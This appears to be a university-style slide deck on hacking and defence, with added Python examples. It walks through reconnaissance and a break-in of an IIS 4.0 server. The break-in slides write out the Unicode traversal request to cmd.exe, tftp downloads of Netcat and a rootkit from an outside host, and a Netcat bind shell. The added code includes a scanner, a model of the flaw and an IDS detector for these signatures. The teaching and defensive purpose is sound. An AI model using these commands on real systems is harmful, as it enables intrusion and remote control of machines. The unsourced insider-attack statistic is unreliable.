Internet Security & Hacking

Software Security & Hacking
Dan Guerndt
[email protected]
Outline
• Types of Hackers
• The Hacker you don't want to be up against
• Information needed by a Hacker
• Tools needed by a Hacker
• WhoIs Databases
• Social Engineering
• Example of Breaking Into a System
• Defensive Measures
• How the Law deals with Hacking
Introduction
• Why learn how to hack?
– The best defense is a good offense
– Learn what attackers need and how they work
– Use the same techniques to find the entry points into your own systems
• Defensive measures to take against attackers
Types of Hackers
• Three-tier pyramid
– Cream of the crop
  • IQs that boil water
  • Write their own scripts and tools
  • Find new vulnerabilities
– IT savvy
– Script "kiddies"
  • Easiest to catch
  • Fire off scripts and programs until something works
• All of them are dangerous
Typical Hacker you don't want to be up against
• Unlimited patience
– Cracking a system can take a long time
– Waits for the right moment, such as when the administrator is busy backing up the system
• Planned attack
• Extensive research
• Avoids the easy approaches (they may be traps)
• Social engineer
• Uses only the stealthiest approaches
Information needed by a Hacker
• Domain name
• IP address(es)
• Operating system and version number
• Open ports
• Knowledge of the IDS/firewalls in place
• Known vulnerabilities for that software
• System administrator's name and contact details
Tools needed by a Hacker
• WhoIs databases
• Reconnaissance and port-scanning programs
– Netcat, the "Swiss Army knife" of TCP/IP
– Nmap
– nslookup (DNS lookups; not a port scanner, but used alongside them)
• Rootkit
• Vulnerability databases, or extensive knowledge of the target software
WhoIs Databases
Types of queries
• Registrar: the attacker must first find the correct registrar
– http://www.internic.net/whois.html
• Domain: gives the domain name, administrative contact and DNS server info
• Network: gives the specific network blocks the organization owns
– http://www.arin.net
• Point of contact: search ARIN using the e-mail address from the domain query; this sometimes reveals more domains the attacker did not know about
Social Engineering
• The attacker acts as if he or she belongs
• The "I LOVE YOU" virus
• The attacker who walks into HQ
• Interview example
• Women
Breaking into a System: Step 1
• Find the target's web site
• Resolve it to an IP address with nslookup, or with a web front-end such as http://www.kloth.net/services/nslookup.php
• Port-scan that address
– Nmap, Netcat
Breaking Into a System: Step 2
• Need the rest of the target network's IP address range
• ARIN database search: gives every address block the organization owns
• Nmap: shows only the hosts that are up and their open ports
• Single SYN/ACK exchange per port (half-open scan; the handshake is never completed)
• Note: nmap -sP is a ping sweep and reports only which hosts are up; the port table below comes from the follow-up port scan of the one live host

$ nmap -sP 208.37.215.0/24
Interesting ports on [208.37.215.233]
(The 1529 ports scanned but not shown below are in state: closed)
Port      State   Service
21/tcp    open    ftp
22/tcp    open    ssh
23/tcp    open    telnet
79/tcp    open    finger
80/tcp    open    http
143/tcp   open    imap2
Nmap run completed -- 256 IP addresses (1 host up) scanned in 360 seconds
Breaking into a System: Step 3
• Don't want to use Nmap's OS detection: its probes are easily noticed
• Use telnet instead
• Most web servers announce their HTTP server version, which in turn reveals the operating system
Step 3 (Continued)
$ telnet 208.37.215.233 80
Trying 208.37.215.233...
Connected to 208.37.215.233.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Fri, 16 Feb 2001 18:45:23 GMT
Content-Length: 526
Content-Type: text/html

Connection closed by foreign host.
IIS 4.0 ships with Windows NT 4.0, so the attacker now looks for vulnerabilities in Windows NT 4.0 and IIS 4.0
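Steps 1 to 3 as a small script, added here as an example and not part of the original talk: a TCP connect scan of a list of ports, followed by the same HEAD request typed into telnet above, with the reply parsed into headers. Because the example has to run offline, it starts a throwaway loopback HTTP server (constructed here) that answers with the "Server: Microsoft-IIS/4.0" banner from the slide; the FakeIIS class, the loopback address and the ports are assumptions of the example, and the real target in the talk would be 208.37.215.233.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class FakeIIS(BaseHTTPRequestHandler):
    """Stand-in target (constructed for this example) that mimics the banner
    seen in the talk. Real recon would point scan_ports/grab_http_banner at
    the target host instead."""

    def version_string(self):
        return "Microsoft-IIS/4.0"  # becomes the Server: header

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", "526")
        self.end_headers()

    def log_message(self, *args):  # keep the example quiet
        pass


def start_fake_iis():
    """Bind the stand-in server to a free loopback port and return that port."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), FakeIIS)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1]


def scan_ports(host, ports, timeout=0.5):
    """TCP connect scan: a port is open if the three-way handshake completes.
    The talk's nmap run used a half-open SYN scan; connect() is the
    unprivileged equivalent, and it is what the target's logs will record."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_http_banner(host, port, timeout=2.0):
    """Send the HEAD request from Step 3 and parse the reply.
    Returns (status_line, headers) with header names lower-cased."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    head = data.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def fingerprint(host, port):
    """The one field Step 3 is after: the Server: header, or '' if absent."""
    _, headers = grab_http_banner(host, port)
    return headers.get("server", "")


if __name__ == "__main__":
    port = start_fake_iis()
    print("open ports:", scan_ports("127.0.0.1", [port]))
    print("server banner:", fingerprint("127.0.0.1", port))
```

The same two calls work against a real host; the difference from the slide is only that the banner is parsed instead of read by eye.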
Breaking Into a System: Step 4
• As a rule of thumb, the latest vulnerabilities are often the least defended against
• After finding vulnerabilities, the attacker exploits them
• This example uses the IIS Unicode directory traversal bug: the overlong UTF-8 sequence %c1%9c decodes to a backslash only after the server's path check has run, so "..%c1%9c.." walks out of the /scripts directory
Step 4 (Continued)
$ telnet 208.37.215.233 80
Trying 208.37.215.233...
Connected to 208.37.215.233.
Escape character is '^]'.
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+echo+test+message+>+test.msg

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Fri, 16 Feb 2001 19:20:32 GMT
Content-Length: 0
Content-Type: text/plain

Connection closed by foreign host.
Seems to have worked: no error, but we must double-check
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+type+test.msg
• This GET displays the file created above
– We now have the ability to read and write files on the server, and to run cmd.exe
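An added example (not from the talk) that models why the request above works. The lenient decoder, the mapping of /scripts onto /inetpub/scripts and the order of operations are assumptions of this example that model the flaw, not IIS source code: the vulnerable resolver checks for ".." segments before it decodes the overlong sequence, so "..%c1%9c.." looks like one oddly named directory and only afterwards becomes "..\..". The hardened resolver decodes strictly (rejecting overlong UTF-8), canonicalises, and then checks that the result is still inside the web root.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Directory that the /scripts virtual directory maps to (assumed layout for
# this example; on a real NT box it would be something like C:\Inetpub\scripts).
WEBROOT = "/inetpub/scripts"

# The request path from the talk; the ?/c+... query part is stripped by the resolvers.
EXPLOIT_PATH = "/scripts/..%c1%9c../winnt/system32/cmd.exe"


def overlong_utf8_decode(data: bytes) -> str:
    """Lenient decoder modelling the flaw: it accepts 2-byte overlong
    sequences such as C1 9C. Strict UTF-8 forbids them because 0x5C
    (backslash) already has a 1-byte encoding; valid 2-byte sequences
    such as C3 A9 decode the same way here."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))  # ASCII (and stray bytes) passed through
            i += 1
    return "".join(out)


def climbs_above_root(path_text: str) -> bool:
    """Segment-wise '..' check: True if the path ever rises above its start."""
    depth = 0
    for seg in path_text.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def vulnerable_resolve(url_path: str) -> str:
    """Check first, decode second: the ordering the exploit abuses."""
    raw = unquote_to_bytes(url_path.split("?", 1)[0])
    if climbs_above_root(raw.decode("latin-1")):
        raise PermissionError("traversal rejected")
    # The '..\xc1\x9c..' segment only turns into '..\..' at this point.
    text = overlong_utf8_decode(raw).replace("\\", "/")
    rel = text[len("/scripts/"):]
    return posixpath.normpath(posixpath.join(WEBROOT, rel))


def safe_resolve(url_path: str) -> str:
    """Decode fully and strictly, canonicalise, then check containment."""
    raw = unquote_to_bytes(url_path.split("?", 1)[0])
    try:
        text = raw.decode("utf-8")  # strict: C0/C1 lead bytes are invalid
    except UnicodeDecodeError as exc:
        raise PermissionError(f"invalid UTF-8 in path: {exc.reason}")
    text = text.replace("\\", "/")
    if not text.startswith("/scripts/"):
        raise PermissionError("not under /scripts")
    full = posixpath.normpath(posixpath.join(WEBROOT, text[len("/scripts/"):]))
    if full != WEBROOT and not full.startswith(WEBROOT + "/"):
        raise PermissionError(f"resolved outside web root: {full}")
    return full


def rejects(resolver, url_path: str) -> bool:
    """True if the given resolver refuses the request."""
    try:
        resolver(url_path)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable ->", vulnerable_resolve(EXPLOIT_PATH))
    print("hardened rejects exploit:", rejects(safe_resolve, EXPLOIT_PATH))
```

Note that the plain "/scripts/../../winnt/system32/cmd.exe" is refused by both resolvers; the bug is purely that the check and the decode run in the wrong order.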
Breaking Into a System: Step 5
• The attacker must download two programs onto the target system
– Rootkit
– Netcat, to open a port of our own
• Since the Windows NT ftp client does not support passive FTP, the attacker uses TFTP (Trivial File Transfer Protocol), which fetches a file with one non-interactive command
• GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+216.240.45.60+GET+nc.exe
Step 5 (Continued)
• Download Netcat
– GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+216.240.45.60+GET+"NetCat".exe
• Download the rootkit
– GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+216.240.45.60+GET+'RootKit'.exe
Step 5 (Continued)
• The attacker must issue a Netcat command to bind a port for the attacker's use
– GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+nc.exe+-l+-p+100+-t+-e+cmd.exe
– Listens on port 100 and hands each connection a cmd.exe (must use a port not already in use on the target system)
Step 5 (Continued)
$ telnet 208.37.215.233 100
Trying 208.37.215.233...
Connected to 208.37.215.233.
Escape character is '^]'.
C:\winnt\system32>
The attacker now has a command shell on the target system and runs the rootkit
Defending against Hackers
• Patch (the #1 defense)
– Check for updates daily
– Vendors should correct mistakes quickly
– Know which vulnerabilities you are still exposed to
– If the attacker cannot find a published vulnerability, the attacker has to discover a new one not yet released to the public
Defending (Continued)
• Firewall
– The fewer open ports the better
– Fewer targets for vulnerabilities
• IDS (intrusion detection system)
– Detects abnormal traffic but usually does not block it
– Raises an alert
– Very hard for attackers to detect
– Works internally and externally
– Can be completely passive
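Detection logic for the IDS point, added here as an example and not part of the original talk. It runs over constructed IIS-style (W3C extended) log lines, assumed to carry date, time, client IP, method, URI stem, query and status, and flags the signatures of Steps 4 and 5 above: overlong UTF-8 in the path, traversal, cmd.exe, a tftp download and a Netcat bind shell. Flagging C0/C1 lead bytes (and E0 followed by 80-9F, F0 followed by 80-8F) catches every overlong form, not only %c1%9c, because no valid UTF-8 sequence starts with them.

```python
from urllib.parse import unquote_to_bytes

# Constructed IIS-style log lines (not real logs):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2001-02-16 18:45:23 216.240.45.60 HEAD / - 200
2001-02-16 19:20:32 216.240.45.60 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+echo+test+message+>+test.msg 200
2001-02-16 19:21:10 216.240.45.60 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+tftp+-i+216.240.45.60+GET+nc.exe 200
2001-02-16 19:22:05 216.240.45.60 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+nc.exe+-l+-p+100+-t+-e+cmd.exe 200
2001-02-16 19:30:00 10.0.0.7 GET /scripts/order.asp id=42 200
2001-02-16 19:31:00 10.0.0.8 GET /images/caf%c3%a9.gif - 200
"""


def has_overlong_utf8(data: bytes) -> bool:
    """True if any byte starts an overlong UTF-8 sequence. C0 and C1 are
    never valid lead bytes; E0 80-9F and F0 80-8F are the 3- and 4-byte
    overlong ranges."""
    for i, b in enumerate(data):
        if b in (0xC0, 0xC1):
            return True
        nxt = data[i + 1] if i + 1 < len(data) else None
        if nxt is not None and b == 0xE0 and 0x80 <= nxt <= 0x9F:
            return True
        if nxt is not None and b == 0xF0 and 0x80 <= nxt <= 0x8F:
            return True
    return False


def analyze_line(line: str) -> list:
    """Return the list of signatures that match one log line ([] if clean)."""
    fields = line.split()
    if len(fields) < 7:
        return []
    stem, query = fields[4], fields[5]
    stem_bytes = unquote_to_bytes(stem)
    reasons = []
    if has_overlong_utf8(stem_bytes):
        reasons.append("overlong-utf8")
    if b".." in stem_bytes:
        reasons.append("traversal")
    if b"cmd.exe" in stem_bytes.lower():
        reasons.append("cmd.exe")
    # The query is the cmd.exe command line; '+' separated its arguments.
    args = unquote_to_bytes(query.replace("+", " ")).lower().split()
    if b"tftp" in args:
        reasons.append("tftp-download")
    if any(a in (b"nc", b"nc.exe") for a in args) and b"-e" in args:
        reasons.append("bind-shell")
    return reasons


def scan_log(text: str) -> list:
    """Return (line number, client IP, reasons) for every line that matched."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        reasons = analyze_line(line)
        if reasons:
            hits.append((n, line.split()[2], reasons))
    return hits


if __name__ == "__main__":
    for lineno, client, reasons in scan_log(SAMPLE_LOG):
        print(f"line {lineno} from {client}: {', '.join(reasons)}")
```

The legitimate "caf%c3%a9.gif" request is not flagged because C3 A9 is a well-formed two-byte sequence; only the overlong encodings that the traversal relies on trip the first rule.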
Defending (Continued)
• Do not give away incriminating information
– Watch what appears in the WhoIs databases
– Be careful what is published on company web sites
– Attackers will often give up if the information cannot be found
– Be careful what is shown at the company site
  • Servers should not be on public display
  • No toy penguins! (a mascot on a server photo tells visitors which OS you run)
Defending (Continued)
• 70% of all attacks are carried out by employees
– An employee who plants malicious code before leaving may have a backdoor
• Full audit!
– Costs time and money
– All code must be properly documented
– Model diagrams also help, so the written code can be compared against the design
Defending (Continued)
• Set up a trap (a honeypot)
– Leave an obvious, easy entry point open
– Never use that entry point yourself
– Flag every occurrence of its use
Law and Hacking
• A conviction is often a felony
• Good luck getting an IT job with a hacking conviction!
• Fines and jail time depend on the damage done
– 5+ years
– $250,000 fine
Test your might!
• www.hackthissite.org
Conclusion
• All types of attackers are dangerous
• Attackers need information and tools
• Exposed server information should be hidden
• Anything is penetrable, no matter how secure
• Be wary of disgruntled employees and social engineering ploys
• Patch frequently